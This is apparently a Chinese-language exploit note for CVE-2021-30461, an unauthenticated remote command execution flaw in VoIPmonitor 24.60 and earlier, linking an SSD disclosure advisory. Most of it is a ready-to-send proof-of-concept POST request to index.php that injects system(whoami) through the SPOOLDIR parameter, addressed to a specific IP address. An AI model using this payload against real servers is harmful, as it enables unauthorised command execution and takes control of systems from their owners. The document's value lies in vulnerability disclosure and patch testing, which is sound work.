VoIPmonitor UnAuth RCE（CVE-2021-30461）

VoIPmonitor 是一个开源的实时网络抓包并分析SIP和RTP protocol的程序.使用通过Web界面到达的用户提供的数据，使用SPOOLDIR和recheck参数对index.php文件发出POST请求时，远程攻击者可以运行任意命令。

影响版本： VoIPmonitor 24.60 及更低版本

poc：

POST /index.php HTTP/1.1
Host: 206.166.208.228

SPOOLDIR=test%22.system%28whoami%29.%22

ref：

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/